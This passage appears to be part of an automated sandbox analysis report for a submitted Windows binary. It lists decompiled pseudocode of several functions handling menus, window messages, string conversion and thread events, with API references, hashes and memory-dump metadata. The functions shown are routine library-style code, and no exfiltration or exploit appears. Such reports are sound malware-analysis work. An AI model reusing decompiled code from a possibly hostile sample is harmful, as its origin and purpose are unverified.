								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                  0x004425e4
                  0x004425eb
                  0x00442602
                  0x00000000
                  0x004425f2
                  0x004425f4
                  0x0044260e
                  0x00442613
                  0x00442616
                  0x00442619
                  0x00442642
                  0x00442649
                  0x0044264b
                  0x004426cc
                  0x004426e7
                  0x004426e9
                  0x00442629
                  0x00442629
                  0x0044262c
                  0x0044262e
                  0x00442631
                  0x00442631
                  0x00442631
                  0x00442631
                  0x00000000
                  0x00442637
                  0x004426ab
                  0x004426ab
                  0x004426b0
                  0x004426b6
                  0x004426b9
                  0x004426bb
                  0x004426be
                  0x004426be
                  0x004426be
                  0x004426be
                  0x00000000
                  0x004426c2
                  0x0044264d
                  0x00442650
                  0x00442656
                  0x00442659
                  0x00442680
                  0x00442683
                  0x00442689
                  0x00000000
                  0x00000000
                  0x0044268b
                  0x0044268e
                  0x00000000
                  0x00000000
                  0x00442690
                  0x00442690
                  0x00442696
                  0x00442699
                  0x00442607
                  0x00442607
                  0x004426a2
                  0x00000000
                  0x004426a2
                  0x0044265b
                  0x0044265e
                  0x00000000
                  0x00000000
                  0x00442662
                  0x00442673
                  0x00442679
                  0x0044267b
                  0x0044267e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0044267e
                  0x0044261b
                  0x0044261e
                  0x00442620
                  0x00442626
                  0x00442626
                  0x00000000
                  0x004425f6
                  0x004425f6
                  0x004425fb
                  0x004425ff
                  0x004425ff
                  0x00000000
                  0x004425fb
                  0x004425f4

                  APIs
                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0044260E
                  • __isleadbyte_l.LIBCMT ref: 00442642
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,004307FC,?,00000000,00000000,?,?,?,?,004307FC,00000000,?), ref: 00442673
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,004307FC,00000001,00000000,00000000,?,?,?,?,004307FC,00000000,?), ref: 004426E1
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                  • String ID:
                  • API String ID: 3058430110-0
                  • Opcode ID: 4f51aa9334f70c85223a4e687f06baf9a762fd662b4e9dda525f56099a8685db
                  • Instruction ID: 7a3e3710ad6dcf06bb425cbd2a2258c827f30c13012a9450a5fd42bd5fc93319
                  • Opcode Fuzzy Hash: 4f51aa9334f70c85223a4e687f06baf9a762fd662b4e9dda525f56099a8685db
                  • Instruction Fuzzy Hash: 5231F331A00246EFEB21DF64C990AAE7BA4FF01310F56856AF4518B291D7B4DD41DB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040A8A9, Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                  Download Yara Rule
                  C-Code - Quality: 97%
                  			E0040A8A9(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				struct HWND__* _t37;
				signed int _t38;
				void* _t65;
				short* _t67;
				struct HWND__** _t69;
				void* _t70;
				struct HWND__** _t74;
				intOrPtr _t76;

				_t66 = __edi;
				_t65 = __edx;
				_push(0x10c);
				E00431B04(E0044AD6E, __ebx, __edi, __esi);
				_t69 =  *(_t70 + 0xc);
				_t34 =  *((intOrPtr*)(_t70 + 0x10));
				_t74 = _t69;
				_t56 = 0 | _t74 != 0x00000000;
				 *((intOrPtr*)(_t70 - 0x118)) = _t34;
				_t75 = _t74 != 0;
				if(_t74 != 0) {
					L2:
					_t76 = _t34;
					_t56 = 0 | _t76 != 0x00000000;
					if(_t76 != 0) {
						goto L1;
					}
					E004014C0(_t70 - 0x114, _t65);
					_t59 = _t69[2];
					_t37 = _t69[1];
					_t67 = 0xfffffdf8;
					 *((intOrPtr*)(_t70 - 4)) = 0;
					if(_t59 != 0xfffffdf8 || (_t69[0x19] & 0x00000001) == 0) {
						if(_t59 != 0xfffffdee || (_t69[0x2d] & 0x00000001) == 0) {
							goto L8;
						} else {
							goto L7;
						}
					} else {
						L7:
						_t37 = GetDlgCtrlID(_t37);
						L8:
						if(_t37 == 0) {
							L12:
							__eflags = _t69[2] - _t67;
							if(_t69[2] != _t67) {
								_t67 =  &(_t69[4]);
								_t38 = MultiByteToWideChar(3, 0,  *(_t70 - 0x114), 0xffffffff, _t67, 0x50);
								__eflags = _t67;
								if(_t67 != 0) {
									__eflags = _t38 - 0x50;
									if(_t38 > 0x50) {
										_t38 = E00401090(_t59, _t65, 0x80004005);
									}
								}
								__eflags = _t38;
								if(_t38 > 0) {
									__eflags = _t67;
									if(_t67 != 0) {
										__eflags = 0;
										 *((short*)(_t67 + _t38 * 2 - 2)) = 0;
									}
								}
							} else {
								E0040842D(0, _t65, _t67, _t69,  &(_t69[4]), 0x50,  *(_t70 - 0x114), 0xffffffff);
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t70 - 0x118)))) = 0;
							SetWindowPos( *_t69, 0, 0, 0, 0, 0, 0x213);
							E004010B0( &(( *(_t70 - 0x114))[0xfffffffffffffff0]), _t65);
							__eflags = 1;
							L21:
							return E00431B87(0, _t67, _t69);
						}
						_t59 = _t70 - 0x110;
						if(E0041B239(0, _t70 - 0x110, _t67, _t69, _t37, _t70 - 0x110, 0x100) != 0) {
							E0041B29E(_t70 - 0x114, _t70 - 0x110, 1, 0xa);
							goto L12;
						} else {
							E004010B0( &(( *(_t70 - 0x114))[0xfffffffffffffff0]), _t65);
							goto L21;
						}
					}
				}
				L1:
				_t34 = E00406436(0, _t56, _t66, _t69, _t75);
				goto L2;
			}












                  0x0040a8a9
                  0x0040a8a9
                  0x0040a8a9
                  0x0040a8b3
                  0x0040a8b8
                  0x0040a8bb
                  0x0040a8c2
                  0x0040a8c4
                  0x0040a8c7
                  0x0040a8cd
                  0x0040a8cf
                  0x0040a8d6
                  0x0040a8d8
                  0x0040a8da
                  0x0040a8e1
                  0x00000000
                  0x00000000
                  0x0040a8e9
                  0x0040a8ee
                  0x0040a8f1
                  0x0040a8f4
                  0x0040a8f9
                  0x0040a8fe
                  0x0040a90c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040a917
                  0x0040a917
                  0x0040a918
                  0x0040a91e
                  0x0040a920
                  0x0040a964
                  0x0040a964
                  0x0040a967
                  0x0040a983
                  0x0040a992
                  0x0040a998
                  0x0040a99a
                  0x0040a99c
                  0x0040a99f
                  0x0040a9a6
                  0x0040a9a6
                  0x0040a99f
                  0x0040a9ab
                  0x0040a9ad
                  0x0040a9af
                  0x0040a9b1
                  0x0040a9b3
                  0x0040a9b5
                  0x0040a9b5
                  0x0040a9b1
                  0x0040a969
                  0x0040a977
                  0x0040a97c
                  0x0040a9ca
                  0x0040a9ce
                  0x0040a9dd
                  0x0040a9e4
                  0x0040a9e5
                  0x0040a9ea
                  0x0040a9ea
                  0x0040a927
                  0x0040a936
                  0x0040a95f
                  0x00000000
                  0x0040a938
                  0x0040a941
                  0x00000000
                  0x0040a946
                  0x0040a936
                  0x0040a8fe
                  0x0040a8d1
                  0x0040a8d1
                  0x00000000

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0040A8B3
                  • GetDlgCtrlID.USER32 ref: 0040A918
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,00000050,0000010C,00404692,?,?,?), ref: 0040A992
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0040A9CE
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ByteCharCtrlException@8H_prolog3H_prolog3_MultiThrowWideWindow
                  • String ID:
                  • API String ID: 1933732581-0
                  • Opcode ID: 3165a1b386513dabdfb5d7ee7af79dfe6ece074409af96b752cbb1d83e808885
                  • Instruction ID: 4d93c7147c348ebad3ea942ba8eea6060f3f1e63af0d97cf858e573eee83d13f
                  • Opcode Fuzzy Hash: 3165a1b386513dabdfb5d7ee7af79dfe6ece074409af96b752cbb1d83e808885
                  • Instruction Fuzzy Hash: AB31E371A003199BCF24DB748D86BEE7264AF04714F110A7EF656F22D1DA789D90CA1B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042495D, Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E0042495D(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E0041F396(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E0041F363(_t51, _t65, 0, _t77) + 4));
					_t70 = E004205AE(0x466508);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E004344B4(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E004316F6(_t51, _t66, _t70, _t83);
								}
								_t37 = E0043108C(_t51, _t64, _t66,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E0043108C(_t51, _t64, _t66, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E004344B4(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E00415AD9();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x20)), _t65);
				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x18)), _t65);
				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x14)), _t65);
				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}





















                  0x0042495d
                  0x0042495d
                  0x00424969
                  0x0042496b
                  0x00424972
                  0x00424a4a
                  0x00424a55
                  0x00424a55
                  0x00424978
                  0x00424979
                  0x0042497e
                  0x00000000
                  0x00000000
                  0x00424987
                  0x004249cb
                  0x004249cb
                  0x004249d1
                  0x004249de
                  0x004249e2
                  0x00424a49
                  0x00000000
                  0x004249e8
                  0x004249e8
                  0x004249eb
                  0x004249ed
                  0x004249fe
                  0x00424a05
                  0x00424a07
                  0x00424a0a
                  0x00424a0e
                  0x00424a10
                  0x00424a12
                  0x00424a13
                  0x00424a18
                  0x00424a1b
                  0x00424a1e
                  0x00424a24
                  0x00424a2b
                  0x00424a31
                  0x00424a36
                  0x00424a46
                  0x00424a46
                  0x00424a36
                  0x00000000
                  0x00424a05
                  0x004249ef
                  0x004249fc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004249fc
                  0x004249e2
                  0x0042498d
                  0x0042498f
                  0x00424996
                  0x00424998
                  0x0042499b
                  0x0042499d
                  0x004249a1
                  0x004249a1
                  0x0042499d
                  0x00424996
                  0x004249a6
                  0x004249ae
                  0x004249b6
                  0x004249be
                  0x004249c6
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __msize_malloc
                  • String ID:
                  • API String ID: 1288803200-0
                  • Opcode ID: 0a0fb8dd703eed77f7ba8fb0962ca666536f27cc64845c8a66cdf0238207c114
                  • Instruction ID: a563689fdaf21f1efb45e35565f73d8a1b00968b58a58eb4e159542aa28b78ed
                  • Opcode Fuzzy Hash: 0a0fb8dd703eed77f7ba8fb0962ca666536f27cc64845c8a66cdf0238207c114
                  • Instruction Fuzzy Hash: B821D6707006209FCB24AF75E88165F77A4FFC4364B50852FE8188B696DB38DC91CA8C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00416327, Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E00416327(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t36;
				intOrPtr _t40;
				intOrPtr* _t44;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				intOrPtr _t54;
				void* _t59;
				intOrPtr* _t71;
				intOrPtr* _t73;
				void* _t75;
				void* _t76;

				_t76 = __eflags;
				_push(0x60);
				E00431ACE(E0044B391, __ebx, __edi, __esi);
				_t71 =  *((intOrPtr*)(_t75 + 8));
				_t73 =  *((intOrPtr*)(_t71 + 4));
				 *((intOrPtr*)(_t75 - 0x14)) = _t73;
				E0040D77C(_t75 - 0x68, _t76);
				 *(_t75 - 4) = 0;
				 *(_t75 - 4) = 1;
				 *((intOrPtr*)(E0041EDAB(0, _t71, _t73, _t76) + 4)) =  *((intOrPtr*)( *_t71 + 4));
				_t36 = E0041F363(0, _t71, _t73, _t76);
				_t9 = _t36 + 0x74; // 0x74
				 *((intOrPtr*)(_t73 + 0x1c)) = _t36;
				 *((intOrPtr*)(E00409F26(0, _t9, _t71, _t73, _t76) + 4)) = _t73;
				E004161F7(_t73, _t76);
				_t40 =  *((intOrPtr*)(E0041F363(0, _t71, _t73, _t76) + 4));
				if(_t40 != 0 &&  *((intOrPtr*)(_t73 + 0x20)) == 0) {
					_t54 =  *((intOrPtr*)(_t40 + 0x20));
					if(_t54 != 0 &&  *((intOrPtr*)(_t54 + 0x20)) != 0) {
						E0040EE89(_t75 - 0x68,  *((intOrPtr*)(_t54 + 0x20)));
						 *((intOrPtr*)(_t73 + 0x20)) = _t75 - 0x68;
					}
				}
				 *(_t75 - 4) = 0;
				_t59 =  *(_t71 + 0x14);
				SetEvent( *(_t71 + 0x10));
				WaitForSingleObject(_t59, 0xffffffff);
				CloseHandle(_t59);
				_t44 =  *((intOrPtr*)(_t73 + 0x38));
				_t81 = _t44;
				if(_t44 == 0) {
					_t46 =  *((intOrPtr*)( *_t73 + 0x50))();
					__eflags = _t46;
					_t47 =  *_t73;
					if(_t46 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x54))();
					} else {
						_t48 =  *((intOrPtr*)(_t47 + 0x68))();
					}
				} else {
					_t48 =  *_t44( *((intOrPtr*)(_t73 + 0x34)));
				}
				E0040EEC5(_t59, _t75 - 0x68);
				E00415EE7(_t75 - 0x68, _t81, _t48, 1);
				 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
				E0040F76D(_t59, _t75 - 0x68, _t71, _t48, _t81);
				return E00431B73(0);
			}















                  0x00416327
                  0x00416327
                  0x0041632e
                  0x00416333
                  0x00416336
                  0x0041633c
                  0x0041633f
                  0x00416346
                  0x00416349
                  0x00416357
                  0x0041635a
                  0x0041635f
                  0x00416362
                  0x0041636a
                  0x0041636d
                  0x00416377
                  0x0041637c
                  0x00416383
                  0x00416388
                  0x00416395
                  0x0041639d
                  0x0041639d
                  0x00416388
                  0x004163a0
                  0x004163dc
                  0x004163df
                  0x004163e8
                  0x004163ef
                  0x004163f5
                  0x004163f8
                  0x004163fa
                  0x00416408
                  0x0041640b
                  0x0041640d
                  0x00416411
                  0x00416418
                  0x00416413
                  0x00416413
                  0x00416413
                  0x004163fc
                  0x004163ff
                  0x00416401
                  0x00416420
                  0x00416428
                  0x0041642d
                  0x00416434
                  0x00416440

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0041632E
                    • Part of subcall function 004161F7: GetCurrentThreadId.KERNEL32 ref: 0041620A
                    • Part of subcall function 004161F7: SetWindowsHookExA.USER32 ref: 0041621A
                  • SetEvent.KERNEL32(?,00000060), ref: 004163DF
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004163E8
                  • CloseHandle.KERNEL32(?), ref: 004163EF
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                  • String ID:
                  • API String ID: 1532457625-0
                  • Opcode ID: 50310d380d5aa45c0703d31aa760e93ca882309b05ff31cb1263a9d8be084b3a
                  • Instruction ID: 7d1a66d4e27a964e3f0b4e2036f0cf801379f83b2f6e36c6b0dae80c5e1ed748
                  • Opcode Fuzzy Hash: 50310d380d5aa45c0703d31aa760e93ca882309b05ff31cb1263a9d8be084b3a
                  • Instruction Fuzzy Hash: 1D318D74A00705DFCB10EFB2C58499DBBB0BF08314B11457EE45A973A2DB38EA85CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00424BC4, Relevance: 6.1, APIs: 4, Instructions: 66windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 80%
                  			E00424BC4(void* __ebx, intOrPtr __ecx, void* __edi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __esi;
				void* __ebp;
				void* _t15;
				intOrPtr _t18;
				void* _t22;
				void* _t30;
				void* _t31;
				void* _t39;
				intOrPtr _t43;

				_t39 = __edi;
				_t30 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t43 = __ecx;
				_v12 = __ecx;
				_t15 = E0040ED96(__ecx, __eflags);
				if(_t15 != 0) {
					if((E00412B38(_t43) & 0x00000100) != 0) {
						_t35 = _t43;
						_t18 = E004105B2(__ebx, _t43, __edi);
						_v8 = _t18;
						_t49 = _t18;
						if(_t18 == 0) {
							E00406436(__ebx, _t35, __edi, _t43, _t49);
						}
						_push(_t30);
						_push(_t39);
						_t31 = E0040EE3C(_t30, _t35, GetForegroundWindow());
						if(_v8 == _t31 || E0040EE3C(_t31, _t35, GetLastActivePopup( *(_v8 + 0x20))) == _t31 && SendMessageA( *(_t31 + 0x20), 0x36d, 0x40, 0) != 0) {
							_t22 = 1;
							__eflags = 1;
						} else {
							_t22 = 0;
						}
						SendMessageA( *(_v12 + 0x20), 0x36d, 4 + (0 | _t22 == 0x00000000) * 4, 0);
					}
					_t15 = 1;
				}
				return _t15;
			}














                  0x00424bc4
                  0x00424bc4
                  0x00424bc9
                  0x00424bca
                  0x00424bcc
                  0x00424bce
                  0x00424bd1
                  0x00424bd8
                  0x00424bea
                  0x00424bec
                  0x00424bee
                  0x00424bf3
                  0x00424bf6
                  0x00424bf8
                  0x00424bfa
                  0x00424bfa
                  0x00424bff
                  0x00424c00
                  0x00424c13
                  0x00424c1d
                  0x00424c49
                  0x00424c49
                  0x00424c43
                  0x00424c43
                  0x00424c43
                  0x00424c62
                  0x00424c65
                  0x00424c68
                  0x00424c68
                  0x00424c6b

                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • GetForegroundWindow.USER32 ref: 00424C01
                  • GetLastActivePopup.USER32(?), ref: 00424C25
                  • SendMessageA.USER32(?,0000036D,00000040,00000000), ref: 00424C3D
                  • SendMessageA.USER32(?,0000036D,00000000,00000000), ref: 00424C62
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSendWindow$ActiveException@8ForegroundH_prolog3LastLongPopupThrow
                  • String ID:
                  • API String ID: 2019557511-0
                  • Opcode ID: da8f0325275f4c013f387e86fa7bf50d154115ffdca63c4d9d26d7428e297965
                  • Instruction ID: c5b05cd195cb087c410fb02c105aa630a277884f1bcc14efd6469061374fb6a8
                  • Opcode Fuzzy Hash: da8f0325275f4c013f387e86fa7bf50d154115ffdca63c4d9d26d7428e297965
                  • Instruction Fuzzy Hash: 3A11E772B10221BBDB14ABA7ED49F5F3A68EBC5704F02003BB501D3150E678DD00866D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042C4B2, Relevance: 6.1, APIs: 4, Instructions: 61windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 67%
                  			E0042C4B2(int __ebx, intOrPtr* __ecx) {
				signed int _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t22;
				intOrPtr* _t24;
				signed int _t26;
				signed int _t27;
				int _t30;
				void* _t36;
				intOrPtr* _t39;

				_t30 = __ebx;
				_push(__ecx);
				_t39 = __ecx;
				_v8 =  *((intOrPtr*)( *__ecx + 0x1ac))();
				_t22 = CreateMenu();
				 *(_t39 + 0x110) = _t22;
				if(_t22 != 0) {
					_t36 = _t39 + 0x114;
					E00431160(_t36, _t36, 0, 0x18);
					_t24 =  *((intOrPtr*)(_t39 + 0x100));
					_push(_t36);
					_push( *(_t39 + 0x110));
					_push(_t24);
					if( *((intOrPtr*)( *_t24 + 0x24))() == 0) {
						_t26 = 0;
						__eflags = _v8;
						if(_v8 != 0) {
							__eflags =  *(_t39 + 0x128);
							if(__eflags != 0) {
								_t26 = 1;
								__eflags = 1;
							}
							_t27 = E0040607D(_t30, _t36, _t39, __eflags,  *(_t39 + 0x110), _v8, _t36, 1, _t26);
							 *(_t39 + 0x158) = _t27;
							__imp__OleCreateMenuDescriptor( *(_t39 + 0x110), _t36);
							__eflags = _t27;
							_t18 = _t27 != 0;
							__eflags = _t18;
							 *(_t39 + 0x12c) = _t27;
							_t22 = 0 | _t18;
						} else {
							_t22 = 1;
						}
					} else {
						DestroyMenu( *(_t39 + 0x110));
						 *(_t39 + 0x110) =  *(_t39 + 0x110) & 0x00000000;
						_t22 = 0;
					}
				}
				return _t22;
			}














                  0x0042c4b2
                  0x0042c4b7
                  0x0042c4b9
                  0x0042c4c3
                  0x0042c4c6
                  0x0042c4cc
                  0x0042c4d4
                  0x0042c4dd
                  0x0042c4e6
                  0x0042c4eb
                  0x0042c4f6
                  0x0042c4f7
                  0x0042c4fd
                  0x0042c503
                  0x0042c51c
                  0x0042c51e
                  0x0042c521
                  0x0042c526
                  0x0042c52c
                  0x0042c530
                  0x0042c530
                  0x0042c530
                  0x0042c53e
                  0x0042c54a
                  0x0042c550
                  0x0042c558
                  0x0042c55a
                  0x0042c55a
                  0x0042c55d
                  0x0042c563
                  0x0042c523
                  0x0042c523
                  0x0042c523
                  0x0042c505
                  0x0042c50b
                  0x0042c511
                  0x0042c518
                  0x0042c518
                  0x0042c565
                  0x0042c568

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$CreateDestroy_memset
                  • String ID:
                  • API String ID: 2954890696-0
                  • Opcode ID: da75aa6dce72ff148ce3907d131c25f27a074466cf39f28214722d06d9364804
                  • Instruction ID: 1409fe51e83d3908d748dd315e3910663c0b8c09aba28d5bb9e855037b89c16d
                  • Opcode Fuzzy Hash: da75aa6dce72ff148ce3907d131c25f27a074466cf39f28214722d06d9364804
                  • Instruction Fuzzy Hash: 5A118E70A00714AFDB259B31DC49BDB7AE8EF49740F50082EE566D2150DBB1A940DA58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041C667, Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E0041C667(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				wchar_t* _t38;
				int _t39;
				intOrPtr _t44;
				intOrPtr _t51;
				signed int _t52;
				void* _t54;
				void* _t55;

				_t49 = __edx;
				_push(0x60);
				E00431B04(E0044B9C2, __ebx, __edi, __esi);
				_t44 =  *((intOrPtr*)(_t55 + 8));
				_t51 =  *((intOrPtr*)(_t55 + 0xc));
				_t54 = __ecx;
				 *((intOrPtr*)(_t55 - 0x68)) = _t44 + _t51 - 1;
				 *((intOrPtr*)(_t55 - 0x6c)) =  *((intOrPtr*)(E00415AD9() + 0x20));
				_t52 = 0 | _t51 != 0x00000001;
				E004014C0(_t55 - 0x64, __edx);
				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
				if(E0041B29E(_t55 - 0x64,  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x134)) + 0x1c)), _t52, 0xa) != 0) {
					_t38 = _t55 - 0x60;
					if(_t52 != 0) {
						_t39 = swprintf(_t38, 0x50,  *(_t55 - 0x64), _t44,  *((intOrPtr*)(_t55 - 0x68)));
					} else {
						_t39 = swprintf(_t38, 0x50,  *(_t55 - 0x64), _t44);
					}
					if(_t39 > 0) {
						SendMessageA( *( *((intOrPtr*)(_t55 - 0x6c)) + 0x20), 0x362, 0, _t55 - 0x60);
					}
				}
				E004010B0( &(( *(_t55 - 0x64))[0xfffffffffffffffc]), _t49);
				return E00431B87(_t44, _t52, _t54);
			}










